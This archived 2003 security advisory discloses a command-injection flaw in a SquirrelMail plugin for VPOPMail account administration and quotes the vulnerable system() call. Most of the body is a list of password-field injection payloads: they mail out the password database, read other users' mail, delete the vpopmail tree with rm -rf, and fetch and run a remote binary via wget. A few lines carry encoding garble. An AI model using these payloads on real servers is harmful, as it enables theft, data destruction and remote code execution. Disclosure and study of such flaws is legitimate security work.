Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: a6057.htm

VPOPMail Account Administration (squirrel mail) arbitrary remote command execution
12th Mar 2003 [SBWID-6057]

	VPOPMail  Account  Administration  (squirrel  mail)   arbitrary   remote
	command execution


	current version


	error  []  reported  following  interesting  bug
	about VPOPMail Account Administration,  a  squirellmail  plugin  to  let
	user   do   the   tasks   he   would   be    able    using    qmailadmin
	Notes (from the README):
	************* IMPORTANT ************
	    For the plugin to work correctly, the Web-Server needs to run as
	same user
	    as vpopmail does (most common: user vpopmail)
	    this is because the plugin needs write-permissions to the users
	Maildir to
	    - create appropriate .qmail-files
	    - create away - messages
	This (allowing anything to be excuted as the web user) of  course  is  a
	huge security hole. This actually goes beyond that and says to  run  the
	web server as vpopmail!
	Amazing! These people are far too trusting of their users.
	Bad idea. What could be worse?
	How about making it even easier to exploit every vpopmail binary?
	How? Unclean input parsing!
	If the vpopmail user is the same as the webuser  you  get  to  have  fun
	vaddaliasdomain  vconvert         vdominfo         vpasswd
	vadddomain       vdeldomain       vipmap           vpopbull
	vadduser         vdelivermail     vkill            vqmaillocal
	valias           vdeloldusers     vmkpasswd        vsetuserquota
	vchkpw           vdeluser         vmoduser         vuserinfo
	Basically the exploits are unlimited (as you get full access  rights  to
	#change password
	password;~vpopmail/bin/vpasswd user@host password
	#mail password database
	password;cat ~vpopmail/domains/|mail -s owned
	#remove vpopmail
	password;rm -rf ~vpopmail/
	#get listings of mail
	password;ls ~vpopmail/domains/| mail
	#read any users mail
	m\,S\=3D2432 | mail user@host
	#execute other arbatrary code on server
	passwd; wget -O /tmp/f;chmod +x /tmp/f;/tmp/f;
	Here is the offending code (line 45 in vpopmail.php):
	system("$vpasswd $username $pwd");
	As we can see, this is very bad.
	Very bad security model (running your webserver as vpopmail)  backed  up
	by s= loppy coding (passing user entered data into the shell  unescaped)
	=3D=3D ba= d bad bad.
	So you just pass anything I wrote above (or really anything at all  that
	you desire) and you own the systems vpopmail config.
	Enter this data into the password changing field (make sure  it  matches
	up in both) in the squirrel mail vpopmail password section to exploit.
	But it's just a plugin to a webmail system, so no big deal ;-)


	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH